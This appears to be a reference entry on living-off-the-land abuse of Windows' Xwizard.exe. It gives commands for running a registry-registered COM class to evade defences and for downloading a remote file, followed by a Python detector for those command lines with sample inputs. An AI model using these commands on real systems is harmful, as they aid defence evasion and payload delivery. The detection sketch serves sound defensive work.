.. /Xwizard.exe
Execute a custom class that has been added to the registry, or download a file, with Xwizard.exe.
Paths:
- C:\Windows\System32\xwizard.exe
- C:\Windows\SysWOW64\xwizard.exe
Execute
- Xwizard.exe running a custom class that has been added to the registry.
  xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
  - Use case: Run a COM object created in the registry to evade defensive countermeasures
  - Privileges required: User
  - Operating systems: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - ATT&CK® technique: T1218
  - Tags: Execute: COM
- Xwizard.exe running a custom class that has been added to the registry. The /t and /u switches prevent an error message in later Windows 10 builds.
  xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}
  - Use case: Run a COM object created in the registry to evade defensive countermeasures
  - Privileges required: User
  - Operating systems: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - ATT&CK® technique: T1218
  - Tags: Execute: COM
Download
- Xwizard.exe uses the RemoteApp and Desktop Connections wizard to download a file and save it to INetCache.
  xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z{REMOTEURL}
  - Use case: Download a file from the Internet
  - Privileges required: User
  - Operating systems: Windows 10, Windows 11
  - ATT&CK® technique: T1105
  - Tags: Download: INetCache
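
Detection sketch for the three command forms listed above, as an added example that is not part of the original entry or the project's own tooling. It classifies process-creation command lines as the Execute (COM) or Download pattern; the function names, the sample command lines and the example.test URL are constructed for illustration.

```python
import re

# CLSID of the RemoteApp and Desktop Connections wizard, taken from the Download entry.
REMOTEAPP_CLSID = "7940acf8-60ba-4213-a7c3-f3b400ee266d"

# xwizard or xwizard.exe as a bare name, a quoted path, or the last path component.
_IMAGE = re.compile(r'(?:^|[\\/"\s])xwizard(?:\.exe)?(?=["\s]|$)', re.I)
_CLSID = re.compile(r"\{([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})\}", re.I)
_ZARG = re.compile(r"(?:^|\s)/z(\S+)", re.I)


def classify_xwizard(command_line):
    """Return None for unrelated command lines, otherwise a dict with the
    kind of RunWizard invocation, the CLSID, and the URL for downloads."""
    if not _IMAGE.search(command_line):
        return None
    if not re.search(r"\bRunWizard\b", command_line, re.I):
        return None
    clsid = _CLSID.search(command_line)
    if clsid is None:
        return None
    guid = clsid.group(1).lower()
    zarg = _ZARG.search(command_line)
    # Download form: RemoteApp wizard CLSID plus a /z<URL> argument.
    if guid == REMOTEAPP_CLSID and zarg:
        return {"kind": "download", "clsid": guid, "url": zarg.group(1).strip('"')}
    # Any other CLSID passed to RunWizard is the Execute (COM) form.
    return {"kind": "execute", "clsid": guid, "url": None}


# Constructed process-creation command lines (not real telemetry).
SAMPLES = [
    r'xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}',
    r'"C:\Windows\System32\xwizard.exe" RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}',
    r'C:\Windows\SysWOW64\xwizard.exe RunWizard {7940ACF8-60BA-4213-A7C3-F3B400EE266D} /zhttps://files.example.test/a.bin',
    r'notepad.exe C:\notes\xwizard RunWizard.txt',
]


def scan(lines):
    """Return (command_line, finding) pairs for every matching line."""
    return [(line, hit) for line in lines if (hit := classify_xwizard(line))]


if __name__ == "__main__":
    for line, hit in scan(SAMPLES):
        print(hit["kind"], hit["clsid"], hit["url"] or "-", "|", line)
```

For the Execute form, the CLSID returned by classify_xwizard is the value to look up in the registry to see which class the wizard loaded.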